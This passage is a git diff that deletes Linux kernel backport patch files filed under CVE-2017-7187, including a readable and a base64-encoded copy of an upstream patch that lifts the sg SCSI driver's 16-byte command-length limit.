XN0IGZhaWxlZC5cbiIpOwogCQlyZXR1cm4gTlVMTDsKIAl9CisJYmxrX3JxX3NldF9ibG9ja19wYyhycSk7CiAKIAlpZiAoYnVmbGVuICYmIGJsa19ycV9tYXBfa2VybihxLCBycSwgYnVmZmVyLCBidWZsZW4sIEdGUF9OT0lPKSkgewogCQlibGtfcHV0X3JlcXVlc3QocnEpOwpAQCAtMjg3LDcgKzI4OCw2IEBACiAJCXJldHVybiBOVUxMOwogCX0KIAotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCXJxLT5jbWRfZmxhZ3MgfD0gUkVRX0ZBSUxGQVNUX0RFViB8IFJFUV9GQUlMRkFTVF9UUkFOU1BPUlQgfAogCQkJIFJFUV9GQUlMRkFTVF9EUklWRVI7CiAJcnEtPnJldHJpZXMgPSBSREFDX1JFVFJJRVM7CmRpZmYgLS1naXQgYS9kcml2ZXJzL3Njc2kvb3NkL29zZF9pbml0aWF0b3IuYyBiL2RyaXZlcnMvc2NzaS9vc2Qvb3NkX2luaXRpYXRvci5jCmluZGV4IGFhNjYzNjEuLjExYmQ4N2UgMTAwNjQ0Ci0tLSBhL2RyaXZlcnMvc2NzaS9vc2Qvb3NkX2luaXRpYXRvci5jCisrKyBiL2RyaXZlcnMvc2NzaS9vc2Qvb3NkX2luaXRpYXRvci5jCkBAIC0xNTcwLDYgKzE1NzAsNyBAQAogCQlpZiAodW5saWtlbHkoIXJlcSkpCiAJCQlyZXR1cm4gRVJSX1BUUigtRU5PTUVNKTsKIAorCQlibGtfcnFfc2V0X2Jsb2NrX3BjKHJlcSk7CiAJCXJldHVybiByZXE7CiAJfQogfQpAQCAtMTU5MCw3ICsxNTkxLDYgQEAKIAl9CiAKIAlvci0+cmVxdWVzdCA9IHJlcTsKLQlyZXEtPmNtZF90eXBlID0gUkVRX1RZUEVfQkxPQ0tfUEM7CiAJcmVxLT5jbWRfZmxhZ3MgfD0gUkVRX1FVSUVUOwogCiAJcmVxLT50aW1lb3V0ID0gb3ItPnRpbWVvdXQ7CkBAIC0xNjA4LDcgKzE2MDgsNyBAQAogCQkJCXJldCA9IFBUUl9FUlIocmVxKTsKIAkJCQlnb3RvIG91dDsKIAkJCX0KLQkJCXJlcS0+Y21kX3R5cGUgPSBSRVFfVFlQRV9CTE9DS19QQzsKKwkJCWJsa19ycV9zZXRfYmxvY2tfcGMocmVxKTsKIAkJCW9yLT5pbi5yZXEgPSBvci0+cmVxdWVzdC0+bmV4dF9ycSA9IHJlcTsKIAkJfQogCX0gZWxzZSBpZiAoaGFzX2luKQpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL29zc3QuYyBiL2RyaXZlcnMvc2NzaS9vc3N0LmMKaW5kZXggMjE4ODNhMi4uMDcyN2VhNyAxMDA2NDQKLS0tIGEvZHJpdmVycy9zY3NpL29zc3QuYworKysgYi9kcml2ZXJzL3Njc2kvb3NzdC5jCkBAIC0zNjUsNyArMzY1LDcgQEAKIAlpZiAoIXJlcSkKIAkJcmV0dXJuIERSSVZFUl9FUlJPUiA8PCAyNDsKIAotCXJlcS0+Y21kX3R5cGUgPSBSRVFfVFlQRV9CTE9DS19QQzsKKwlibGtfcnFfc2V0X2Jsb2NrX3BjKHJlcSk7CiAJcmVxLT5jbWRfZmxhZ3MgfD0gUkVRX1FVSUVUOwogCiAJU1JwbnQtPmJpbyA9IE5VTEw7CmRpZmYgLS1naXQgYS9kcml2ZXJzL3Njc2kvc2NzaV9lcnJvci5jIGIvZHJpdmVycy9zY3NpL3Njc2lfZXJyb3IuYwppbmRleCAzNjY4YjFiLi5jMWU0YTc0IDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvc2NzaV9lcnJvci5jCisrKyBiL2RyaXZlcnMvc2NzaS9zY3NpX2Vycm9yLmMKQEAgLTE2NTMsNiArMTY1Myw4IEBACiAJICovCiAJcmVxID0gYmxrX2dldF9yZXF1ZXN0KHNkZXYtPnJlcXVlc3RfcXVldWUsIFJFQUQsIEdGUF9LRVJORUwpOwogCisJYmxrX3JxX3NldF9ibG9ja19wYyhyZXEpOworCiAJcmVxLT5jbWRbMF0gPSBBTExPV19NRURJVU1fUkVNT1ZBTDsKIAlyZXEtPmNtZFsxXSA9IDA7CiAJcmVxLT5jbWRbMl0gPSAwOwpAQCAtMTY2Miw3ICsxNjY0LDYgQEAKIAogCXJlcS0+Y21kX2xlbiA9IENPTU1BTkRfU0laRShyZXEtPmNtZFswXSk7CiAKLQlyZXEtPmNtZF90eXBlID0gUkVRX1RZUEVfQkxPQ0tfUEM7CiAJcmVxLT5jbWRfZmxhZ3MgfD0gUkVRX1FVSUVUOwogCXJlcS0+dGltZW91dCA9IDEwICogSFo7CiAJcmVxLT5yZXRyaWVzID0gNTsKZGlmZiAtLWdpdCBhL2RyaXZlcnMvc2NzaS9zY3NpX2xpYi5jIGIvZHJpdmVycy9zY3NpL3Njc2lfbGliLmMKaW5kZXggOWYzMTY4ZS4uNDkwNzZkMSAxMDA2NDQKLS0tIGEvZHJpdmVycy9zY3NpL3Njc2lfbGliLmMKKysrIGIvZHJpdmVycy9zY3NpL3Njc2lfbGliLmMKQEAgLTIzOCw2ICsyMzgsNyBAQAogCXJlcSA9IGJsa19nZXRfcmVxdWVzdChzZGV2LT5yZXF1ZXN0X3F1ZXVlLCB3cml0ZSwgX19HRlBfV0FJVCk7CiAJaWYgKCFyZXEpCiAJCXJldHVybiByZXQ7CisJYmxrX3JxX3NldF9ibG9ja19wYyhyZXEpOwogCiAJaWYgKGJ1ZmZsZW4gJiYJYmxrX3JxX21hcF9rZXJuKHNkZXYtPnJlcXVlc3RfcXVldWUsIHJlcSwKIAkJCQkJYnVmZmVyLCBidWZmbGVuLCBfX0dGUF9XQUlUKSkKQEAgLTI0OSw3ICsyNTAsNiBAQAogCXJlcS0+c2Vuc2VfbGVuID0gMDsKIAlyZXEtPnJldHJpZXMgPSByZXRyaWVzOwogCXJlcS0+dGltZW91dCA9IHRpbWVvdXQ7Ci0JcmVxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCXJlcS0+Y21kX2ZsYWdzIHw9IGZsYWdzIHwgUkVRX1FVSUVUIHwgUkVRX1BSRUVNUFQ7CiAKIAkvKgpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL3NnLmMgYi9kcml2ZXJzL3Njc2kvc2cuYwppbmRleCBlMDU5YWQ0Li41MTcwNTA2IDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvc2cuYworKysgYi9kcml2ZXJzL3Njc2kvc2cuYwpAQCAtMTY1NiwxMCArMTY1Niw5IEBACiAJaWYgKCFycSkKIAkJcmV0dXJuIC1FTk9NRU07CiAKKwlibGtfcnFfc2V0X2Jsb2NrX3BjKHJxKTsKIAltZW1jcHkocnEtPmNtZCwgY21kLCBocC0+Y21kX2xlbik7Ci0KIAlycS0+Y21kX2xlbiA9IGhwLT5jbWRfbGVuOwotCXJxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOwogCiAJc3JwLT5ycSA9IHJxOwogCXJxLT5lbmRfaW9fZGF0YSA9IHNycDsKZGlmZiAtLWdpdCBhL2RyaXZlcnMvc2NzaS9zdC5jIGIvZHJpdmVycy9zY3NpL3N0LmMKaW5kZXggMmEzMjAzNi4uN2Q3NGY4MyAxMDA2NDQKLS0tIGEvZHJpdmVycy9zY3NpL3N0LmMKKysrIGIvZHJpdmVycy9zY3NpL3N0LmMKQEAgLTQ4NCw3ICs0ODQsNyBAQAogCWlmICghcmVxKQogCQlyZXR1cm4gRFJJVkVSX0VSUk9SIDw8IDI0OwogCi0JcmVxLT5jbWRfdHlwZSA9IFJFUV9UWVBFX0JMT0NLX1BDOworCWJsa19ycV9zZXRfYmxvY2tfcGMocmVxKTsKIAlyZXEtPmNtZF9mbGFncyB8PSBSRVFfUVVJRVQ7CiAKIAltZGF0YS0+bnVsbF9tYXBwZWQgPSAxOwpkaWZmIC0tZ2l0IGEvZHJpdmVycy90YXJnZXQvdGFyZ2V0X2NvcmVfcHNjc2kuYyBiL2RyaXZlcnMvdGFyZ2V0L3RhcmdldF9jb3JlX3BzY3NpLmMKaW5kZXggMjQ0Nzc2Yi4uZGZmOTFlZSAxMDA2NDQKLS0tIGEvZHJpdmVycy90YXJnZXQvdGFyZ2V0X2NvcmVfcHNjc2kuYworKysgYi9kcml2ZXJzL3RhcmdldC90YXJnZXRfY29yZV9wc2NzaS5jCkBAIC0xMDU5LDYgKzEwNTksOCBAQAogCQkJcmV0ID0gVENNX0xPR0lDQUxfVU5JVF9DT01NVU5JQ0FUSU9OX0ZBSUxVUkU7CiAJCQlnb3RvIGZhaWw7CiAJCX0KKworCQlibGtfcnFfc2V0X2Jsb2NrX3BjKHJlcSk7CiAJfSBlbHNlIHsKIAkJQlVHX09OKCFjbWQtPmRhdGFfbGVuZ3RoKTsKIApAQCAtMTA3NSw3ICsxMDc3LDYgQEAKIAkJfQogCX0KIAotCXJlcS0+Y21kX3R5cGUgPSBSRVFfVFlQRV9CTE9DS19QQzsKIAlyZXEtPmVuZF9pbyA9IHBzY3NpX3JlcV9kb25lOwogCXJlcS0+ZW5kX2lvX2RhdGEgPSBjbWQ7CiAJcmVxLT5jbWRfbGVuID0gc2NzaV9jb21tYW5kX3NpemUocHQtPnBzY3NpX2NkYik7CmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L2Jsa2Rldi5oIGIvaW5jbHVkZS9saW51eC9ibGtkZXYuaAppbmRleCBlOWIwNGNkLi5jY2U4NGU1IDEwMDY0NAotLS0gYS9pbmNsdWRlL2xpbnV4L2Jsa2Rldi5oCisrKyBiL2luY2x1ZGUvbGludXgvYmxrZGV2LmgKQEAgLTc0Miw2ICs3NDIsNyBAQAogZXh0ZXJuIHN0cnVjdCByZXF1ZXN0ICpibGtfZ2V0X3JlcXVlc3Qoc3RydWN0IHJlcXVlc3RfcXVldWUgKiwgaW50LCBnZnBfdCk7CiBleHRlcm4gc3RydWN0IHJlcXVlc3QgKmJsa19tYWtlX3JlcXVlc3Qoc3RydWN0IHJlcXVlc3RfcXVldWUgKiwgc3RydWN0IGJpbyAqLAogCQkJCQlnZnBfdCk7CitleHRlcm4gdm9pZCBibGtfcnFfc2V0X2Jsb2NrX3BjKHN0cnVjdCByZXF1ZXN0ICopOwogZXh0ZXJuIHZvaWQgYmxrX3JlcXVldWVfcmVxdWVzdChzdHJ1Y3QgcmVxdWVzdF9xdWV1ZSAqLCBzdHJ1Y3QgcmVxdWVzdCAqKTsKIGV4dGVybiBpbnQgYmxrX3JlaW5zZXJ0X3JlcXVlc3Qoc3RydWN0IHJlcXVlc3RfcXVldWUgKnEsIHN0cnVjdCByZXF1ZXN0ICpycSk7CiBleHRlcm4gYm9vbCBibGtfcmVpbnNlcnRfcmVxX3N1cChzdHJ1Y3QgcmVxdWVzdF9xdWV1ZSAqcSk7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch
deleted file mode 100644
index 36d3c6a7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch
+++ /dev/null
@@ -1,263 +0,0 @@
-From 2c5b488b49d92c02ac28f45e68f366c6a51a8949 Mon Sep 17 00:00:00 2001
-From: Douglas Gilbert <dgilbert@interlog.com>
-Date: Tue, 03 Jun 2014 13:18:18 -0400
-Subject: [PATCH] BACKPORT: sg: relax 16 byte cdb restriction
-
- - remove the 16 byte CDB (SCSI command) length limit from the sg driver
-   by handling longer CDBs the same way as the bsg driver. Remove comment
-   from sg.h public interface about the cmd_len field being limited to 16
-   bytes.
- - remove some dead code caused by this change
- - cleanup comment block at the top of sg.h, fix urls
-
-Change-Id: Ie8150e5375b3316d5d5206f079c4a50f1c50b755
-Signed-off-by: Douglas Gilbert <dgilbert@interlog.com>
-Reviewed-by: Mike Christie <michaelc@cs.wisc.edu>
-Reviewed-by: Hannes Reinecke <hare@suse.de>
-Signed-off-by: Christoph Hellwig <hch@lst.de>
----
-
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 5170506..96d635e 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -7,9 +7,7 @@
-  * Original driver (sg.c):
-  *        Copyright (C) 1992 Lawrence Foard
-  * Version 2 and 3 extensions to driver:
-- *        Copyright (C) 1998 - 2005 Douglas Gilbert
-- *
-- *  Modified  19-JAN-1998  Richard Gooch <rgooch@atnf.csiro.au>  Devfs support
-+ *        Copyright (C) 1998 - 2014 Douglas Gilbert
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License as published by
-@@ -18,11 +16,11 @@
-  *
-  */
- 
--static int sg_version_num = 30534;	/* 2 digits for each component */
--#define SG_VERSION_STR "3.5.34"
-+static int sg_version_num = 30536;	/* 2 digits for each component */
-+#define SG_VERSION_STR "3.5.36"
- 
- /*
-- *  D. P. Gilbert (dgilbert@interlog.com, dougg@triode.net.au), notes:
-+ *  D. P. Gilbert (dgilbert@interlog.com), notes:
-  *      - scsi logging is available via SCSI_LOG_TIMEOUT macros. First
-  *        the kernel/module needs to be built with CONFIG_SCSI_LOGGING
-  *        (otherwise the macros compile to empty statements).
-@@ -64,7 +62,7 @@
- 
- #ifdef CONFIG_SCSI_PROC_FS
- #include <linux/proc_fs.h>
--static char *sg_version_date = "20061027";
-+static char *sg_version_date = "20140603";
- 
- static int sg_proc_init(void);
- static void sg_proc_cleanup(void);
-@@ -73,6 +71,12 @@
- #define SG_ALLOW_DIO_DEF 0
- 
- #define SG_MAX_DEVS 32768
-+
-+/* SG_MAX_CDB_SIZE should be 260 (spc4r37 section 3.1.30) however the type
-+ * of sg_io_hdr::cmd_len can only represent 255. All SCSI commands greater
-+ * than 16 bytes are "variable length" whose length is a multiple of 4
-+ */
-+#define SG_MAX_CDB_SIZE 252
- 
- /*
-  * Suppose you want to calculate the formula muldiv(x,m,d)=int(x * m / d)
-@@ -161,7 +165,7 @@
- 	char low_dma;		/* as in parent but possibly overridden to 1 */
- 	char force_packid;	/* 1 -> pack_id input to read(), 0 -> ignored */
- 	char cmd_q;		/* 1 -> allow command queuing, 0 -> don't */
--	char next_cmd_len;	/* 0 -> automatic (def), >0 -> use on next write() */
-+	unsigned char next_cmd_len; /* 0: automatic, >0: use on next write() */
- 	char keep_orphan;	/* 0 -> drop orphan (def), 1 -> keep for read() */
- 	char mmap_called;	/* 0 -> mmap() never called on this fd */
- 	struct kref f_ref;
-@@ -566,7 +570,7 @@
- 	Sg_request *srp;
- 	struct sg_header old_hdr;
- 	sg_io_hdr_t *hp;
--	unsigned char cmnd[MAX_COMMAND_SIZE];
-+	unsigned char cmnd[SG_MAX_CDB_SIZE];
- 
- 	if (unlikely(segment_eq(get_fs(), KERNEL_DS)))
- 		return -EINVAL;
-@@ -601,12 +605,6 @@
- 	buf += SZ_SG_HEADER;
- 	__get_user(opcode, buf);
- 	if (sfp->next_cmd_len > 0) {
--		if (sfp->next_cmd_len > MAX_COMMAND_SIZE) {
--			SCSI_LOG_TIMEOUT(1, printk("sg_write: command length too long\n"));
--			sfp->next_cmd_len = 0;
--			sg_remove_request(sfp, srp);
--			return -EIO;
--		}
- 		cmd_size = sfp->next_cmd_len;
- 		sfp->next_cmd_len = 0;	/* reset so only this write() effected */
- 	} else {
-@@ -678,7 +676,7 @@
- 	int k;
- 	Sg_request *srp;
- 	sg_io_hdr_t *hp;
--	unsigned char cmnd[MAX_COMMAND_SIZE];
-+	unsigned char cmnd[SG_MAX_CDB_SIZE];
- 	int timeout;
- 	unsigned long ul_timeout;
- 
-@@ -1648,15 +1646,27 @@
- 	struct request_queue *q = sfp->parentdp->device->request_queue;
- 	struct rq_map_data *md, map_data;
- 	int rw = hp->dxfer_direction == SG_DXFER_TO_DEV ? WRITE : READ;
-+	unsigned char *long_cmdp = NULL;
- 
- 	SCSI_LOG_TIMEOUT(4, printk(KERN_INFO "sg_start_req: dxfer_len=%d\n",
- 				   dxfer_len));
- 
-+	if (hp->cmd_len > BLK_MAX_CDB) {
-+		long_cmdp = kzalloc(hp->cmd_len, GFP_KERNEL);
-+		if (!long_cmdp)
-+			return -ENOMEM;
-+	}
-+
- 	rq = blk_get_request(q, rw, GFP_ATOMIC);
--	if (!rq)
-+	if (!rq) {
-+		kfree(long_cmdp);
- 		return -ENOMEM;
-+	}
- 
- 	blk_rq_set_block_pc(rq);
-+
-+	if (hp->cmd_len > BLK_MAX_CDB)
-+		rq->cmd = long_cmdp;
- 	memcpy(rq->cmd, cmd, hp->cmd_len);
- 	rq->cmd_len = hp->cmd_len;
- 
-@@ -1741,6 +1751,8 @@
- 		if (srp->bio)
- 			ret = blk_rq_unmap_user(srp->bio);
- 
-+		if (srp->rq->cmd != srp->rq->__cmd)
-+			kfree(srp->rq->cmd);
- 		blk_put_request(srp->rq);
- 	}
- 
-diff --git a/include/uapi/scsi/sg.h b/include/uapi/scsi/sg.h
-index a9f3c6f..d8c0c43 100644
---- a/include/uapi/scsi/sg.h
-+++ b/include/uapi/scsi/sg.h
-@@ -4,77 +4,34 @@
- #include <linux/compiler.h>
- 
- /*
--   History:
--    Started: Aug 9 by Lawrence Foard (entropy@world.std.com), to allow user
--     process control of SCSI devices.
--    Development Sponsored by Killy Corp. NY NY
--Original driver (sg.h):
--*       Copyright (C) 1992 Lawrence Foard
--Version 2 and 3 extensions to driver:
--*       Copyright (C) 1998 - 2006 Douglas Gilbert
--
--    Version: 3.5.34 (20060920)
--    This version is for 2.6 series kernels.
--
--    For a full changelog see http://www.torque.net/sg
--
--Map of SG verions to the Linux kernels in which they appear:
--       ----------        ----------------------------------
--       original          all kernels < 2.2.6
--       2.1.40            2.2.20
--       3.0.x             optional version 3 sg driver for 2.2 series
--       3.1.17++          2.4.0++
--       3.5.30++          2.6.0++
--
--Major new features in SG 3.x driver (cf SG 2.x drivers)
--	- SG_IO ioctl() combines function if write() and read()
--	- new interface (sg_io_hdr_t) but still supports old interface
--	- scatter/gather in user space, direct IO, and mmap supported
--
-- The normal action of this driver is to use the adapter (HBA) driver to DMA
-- data into kernel buffers and then use the CPU to copy the data into the 
-- user space (vice versa for writes). That is called "indirect" IO due to 
-- the double handling of data. There are two methods offered to remove the
-- redundant copy: 1) direct IO and 2) using the mmap() system call to map
-- the reserve buffer (this driver has one reserve buffer per fd) into the
-- user space. Both have their advantages.
-- In terms of absolute speed mmap() is faster. If speed is not a concern, 
-- indirect IO should be fine. Read the documentation for more information.
--
-- ** N.B. To use direct IO 'echo 1 > /proc/scsi/sg/allow_dio' or
--         'echo 1 > /sys/module/sg/parameters/allow_dio' is needed.
--         That attribute is 0 by default. **
-- 
-- Historical note: this SCSI pass-through driver has been known as "sg" for 
-- a decade. In broader kernel discussions "sg" is used to refer to scatter
-- gather techniques. The context should clarify which "sg" is referred to.
--
-- Documentation
-- =============
-- A web site for the SG device driver can be found at:
--	http://www.torque.net/sg  [alternatively check the MAINTAINERS file]
-- The documentation for the sg version 3 driver can be found at:
-- 	http://www.torque.net/sg/p/sg_v3_ho.html
-- This is a rendering from DocBook source [change the extension to "sgml"
-- or "xml"]. There are renderings in "ps", "pdf", "rtf" and "txt" (soon).
-- The SG_IO ioctl is now found in other parts kernel (e.g. the block layer).
-- For more information see http://www.torque.net/sg/sg_io.html
--
-- The older, version 2 documents discuss the original sg interface in detail:
--	http://www.torque.net/sg/p/scsi-generic.txt
--	http://www.torque.net/sg/p/scsi-generic_long.txt
-- Also available: <kernel_source>/Documentation/scsi/scsi-generic.txt
--
-- Utility and test programs are available at the sg web site. They are 
-- packaged as sg3_utils (for the lk 2.4 and 2.6 series) and sg_utils
-- (for the lk 2.2 series).
--*/
-+ * History:
-+ *  Started: Aug 9 by Lawrence Foard (entropy@world.std.com), to allow user
-+ *   process control of SCSI devices.
-+ *  Development Sponsored by Killy Corp. NY NY
-+ *
-+ * Original driver (sg.h):
-+ *       Copyright (C) 1992 Lawrence Foard
-+ * Version 2 and 3 extensions to driver:
-+ *	Copyright (C) 1998 - 2014 Douglas Gilbert
-+ *
-+ *  Version: 3.5.36 (20140603)
-+ *  This version is for 2.6 and 3 series kernels.
-+ *
-+ * Documentation
-+ * =============
-+ * A web site for the SG device driver can be found at:
-+ *	http://sg.danny.cz/sg  [alternatively check the MAINTAINERS file]
-+ * The documentation for the sg version 3 driver can be found at:
-+ *	http://sg.danny.cz/sg/p/sg_v3_ho.html
-+ * Also see: <kernel_source>/Documentation/scsi/scsi-generic.txt
-+ *
-+ * For utility and test programs see: http://sg.danny.cz/sg/sg3_utils.html
-+ */
- 
- #ifdef __KERNEL__
- extern int sg_big_buff; /* for sysctl */
- #endif
- 
--/* New interface introduced in the 3.x SG drivers follows */
- 
- typedef struct sg_iovec /* same structure as used by readv() Linux system */
- {                       /* call. It defines one scatter-gather element. */
-@@ -87,7 +44,7 @@
- {
-     int interface_id;           /* [i] 'S' for SCSI generic (required) */
-     int dxfer_direction;        /* [i] data transfer direction  */
--    unsigned char cmd_len;      /* [i] SCSI command length ( <= 16 bytes) */
-+    unsigned char cmd_len;      /* [i] SCSI command length */
-     unsigned char mx_sb_len;    /* [i] max length to write to sbp */
-     unsigned short iovec_count; /* [i] 0 implies no scatter gather */
-     unsigned int dxfer_len;     /* [i] byte count of data transfer */
diff --git a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch.base64 b/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch.base64
deleted file mode 100644
index e3b54463..00000000
--- a/Patches/Linux_CVEs/CVE-2017-7187/3.10/0005.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAyYzViNDg4YjQ5ZDkyYzAyYWMyOGY0NWU2OGYzNjZjNmE1MWE4OTQ5IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBEb3VnbGFzIEdpbGJlcnQgPGRnaWxiZXJ0QGludGVybG9nLmNvbT4KRGF0ZTogVHVlLCAwMyBKdW4gMjAxNCAxMzoxODoxOCAtMDQwMApTdWJqZWN0OiBbUEFUQ0hdIEJBQ0tQT1JUOiBzZzogcmVsYXggMTYgYnl0ZSBjZGIgcmVzdHJpY3Rpb24KCiAtIHJlbW92ZSB0aGUgMTYgYnl0ZSBDREIgKFNDU0kgY29tbWFuZCkgbGVuZ3RoIGxpbWl0IGZyb20gdGhlIHNnIGRyaXZlcgogICBieSBoYW5kbGluZyBsb25nZXIgQ0RCcyB0aGUgc2FtZSB3YXkgYXMgdGhlIGJzZyBkcml2ZXIuIFJlbW92ZSBjb21tZW50CiAgIGZyb20gc2cuaCBwdWJsaWMgaW50ZXJmYWNlIGFib3V0IHRoZSBjbWRfbGVuIGZpZWxkIGJlaW5nIGxpbWl0ZWQgdG8gMTYKICAgYnl0ZXMuCiAtIHJlbW92ZSBzb21lIGRlYWQgY29kZSBjYXVzZWQgYnkgdGhpcyBjaGFuZ2UKIC0gY2xlYW51cCBjb21tZW50IGJsb2NrIGF0IHRoZSB0b3Agb2Ygc2cuaCwgZml4IHVybHMKCkNoYW5nZS1JZDogSWU4MTUwZTUzNzViMzMxNmQ1ZDUyMDZmMDc5YzRhNTBmMWM1MGI3NTUKU2lnbmVkLW9mZi1ieTogRG91Z2xhcyBHaWxiZXJ0IDxkZ2lsYmVydEBpbnRlcmxvZy5jb20+ClJldmlld2VkLWJ5OiBNaWtlIENocmlzdGllIDxtaWNoYWVsY0Bjcy53aXNjLmVkdT4KUmV2aWV3ZWQtYnk6IEhhbm5lcyBSZWluZWNrZSA8aGFyZUBzdXNlLmRlPgpTaWduZWQtb2ZmLWJ5OiBDaHJpc3RvcGggSGVsbHdpZyA8aGNoQGxzdC5kZT4KLS0tCgpkaWZmIC0tZ2l0IGEvZHJpdmVycy9zY3NpL3NnLmMgYi9kcml2ZXJzL3Njc2kvc2cuYwppbmRleCA1MTcwNTA2Li45NmQ2MzVlIDEwMDY0NAotLS0gYS9kcml2ZXJzL3Njc2kvc2cuYworKysgYi9kcml2ZXJzL3Njc2kvc2cuYwpAQCAtNyw5ICs3LDcgQEAKICAqIE9yaWdpbmFsIGRyaXZlciAoc2cuYyk6CiAgKiAgICAgICAgQ29weXJpZ2h0IChDKSAxOTkyIExhd3JlbmNlIEZvYXJkCiAgKiBWZXJzaW9uIDIgYW5kIDMgZXh0ZW5zaW9ucyB0byBkcml2ZXI6Ci0gKiAgICAgICAgQ29weXJpZ2h0IChDKSAxOTk4IC0gMjAwNSBEb3VnbGFzIEdpbGJlcnQKLSAqCi0gKiAgTW9kaWZpZWQgIDE5LUpBTi0xOTk4ICBSaWNoYXJkIEdvb2NoIDxyZ29vY2hAYXRuZi5jc2lyby5hdT4gIERldmZzIHN1cHBvcnQKKyAqICAgICAgICBDb3B5cmlnaHQgKEMpIDE5OTggLSAyMDE0IERvdWdsYXMgR2lsYmVydAogICoKICAqIFRoaXMgcHJvZ3JhbSBpcyBmcmVlIHNvZnR3YXJlOyB5b3UgY2FuIHJlZGlzdHJpYnV0ZSBpdCBhbmQvb3IgbW9kaWZ5CiAgKiBpdCB1bmRlciB0aGUgdGVybXMgb2YgdGhlIEdOVSBHZW5lcmFsIFB1YmxpYyBMaWNlbnNlIGFzIHB1Ymxpc2hlZCBieQpAQCAtMTgsMTEgKzE2LDExIEBACiAgKgogICovCiAKLXN0YXRpYyBpbnQgc2dfdmVyc2lvbl9udW0gPSAzMDUzNDsJLyogMiBkaWdpdHMgZm9yIGVhY2ggY29tcG9uZW50ICovCi0jZGVmaW5lIFNHX1ZFUlNJT05fU1RSICIzLjUuMzQiCitzdGF0aWMgaW50IHNnX3ZlcnNpb25fbnVtID0gMzA1MzY7CS8qIDIgZGlnaXRzIGZvciBlYWNoIGNvbXBvbmVudCAqLworI2RlZmluZSBTR19WRVJTSU9OX1NUUiAiMy41LjM2IgogCiAvKgotICogIEQuIFAuIEdpbGJlcnQgKGRnaWxiZXJ0QGludGVybG9nLmNvbSwgZG91Z2dAdHJpb2RlLm5ldC5hdSksIG5vdGVzOgorICogIEQuIFAuIEdpbGJlcnQgKGRnaWxiZXJ0QGludGVybG9nLmNvbSksIG5vdGVzOgogICogICAgICAtIHNjc2kgbG9nZ2luZyBpcyBhdmFpbGFibGUgdmlhIFNDU0lfTE9HX1RJTUVPVVQgbWFjcm9zLiBGaXJzdAogICogICAgICAgIHRoZSBrZXJuZWwvbW9kdWxlIG5lZWRzIHRvIGJlIGJ1aWx0IHdpdGggQ09ORklHX1NDU0lfTE9HR0lORwogICogICAgICAgIChvdGhlcndpc2UgdGhlIG1hY3JvcyBjb21waWxlIHRvIGVtcHR5IHN0YXRlbWVudHMpLgpAQCAtNjQsNyArNjIsNyBAQAogCiAjaWZkZWYgQ09ORklHX1NDU0lfUFJPQ19GUwogI2luY2x1ZGUgPGxpbnV4L3Byb2NfZnMuaD4KLXN0YXRpYyBjaGFyICpzZ192ZXJzaW9uX2RhdGUgPSAiMjAwNjEwMjciOworc3RhdGljIGNoYXIgKnNnX3ZlcnNpb25fZGF0ZSA9ICIyMDE0MDYwMyI7CiAKIHN0YXRpYyBpbnQgc2dfcHJvY19pbml0KHZvaWQpOwogc3RhdGljIHZvaWQgc2dfcHJvY19jbGVhbnVwKHZvaWQpOwpAQCAtNzMsNiArNzEsMTIgQEAKICNkZWZpbmUgU0dfQUxMT1dfRElPX0RFRiAwCiAKICNkZWZpbmUgU0dfTUFYX0RFVlMgMzI3NjgKKworLyogU0dfTUFYX0NEQl9TSVpFIHNob3VsZCBiZSAyNjAgKHNwYzRyMzcgc2VjdGlvbiAzLjEuMzApIGhvd2V2ZXIgdGhlIHR5cGUKKyAqIG9mIHNnX2lvX2hkcjo6Y21kX2xlbiBjYW4gb25seSByZXByZXNlbnQgMjU1LiBBbGwgU0NTSSBjb21tYW5kcyBncmVhdGVyCisgKiB0aGFuIDE2IGJ5dGVzIGFyZSAidmFyaWFibGUgbGVuZ3RoIiB3aG9zZSBsZW5ndGggaXMgYSBtdWx0aXBsZSBvZiA0CisgKi8KKyNkZWZpbmUgU0dfTUFYX0NEQl9TSVpFIDI1MgogCiAvKgogICogU3VwcG9zZSB5b3Ugd2FudCB0byBjYWxjdWxhdGUgdGhlIGZvcm11bGEgbXVsZGl2KHgsbSxkKT1pbnQoeCAqIG0gLyBkKQpAQCAtMTYxLDcgKzE2NSw3IEBACiAJY2hhciBsb3dfZG1hOwkJLyogYXMgaW4gcGFyZW50IGJ1dCBwb3NzaWJseSBvdmVycmlkZGVuIHRvIDEgKi8KIAljaGFyIGZvcmNlX3BhY2tpZDsJLyogMSAtPiBwYWNrX2lkIGlucHV0IHRvIHJlYWQoKSwgMCAtPiBpZ25vcmVkICovCiAJY2hhciBjbWRfcTsJCS8qIDEgLT4gYWxsb3cgY29tbWFuZCBxdWV1aW5nLCAwIC0+IGRvbid0ICovCi0JY2hhciBuZXh0X2NtZF9sZW47CS8qIDAgLT4gYXV0b21hdGljIChkZWYpLCA+MCAtPiB1c2Ugb24gbmV4dCB3cml0ZSgpICovCisJdW5zaWduZWQgY2hhciBuZXh0X2NtZF9sZW47IC8qIDA6IGF1dG9tYXRpYywgPjA6IHVzZSBvbiBuZXh0IHdyaXRlKCkgKi8KIAljaGFyIGtlZXBfb3JwaGFuOwkvKiAwIC0+IGRyb3Agb3JwaGFuIChkZWYpLCAxIC0+IGtlZXAgZm9yIHJlYWQoKSAqLwogCWNoYXIgbW1hcF9jYWxsZWQ7CS8qIDAgLT4gbW1hcCgpIG5ldmVyIGNhbGxlZCBvbiB0aGlzIGZkICovC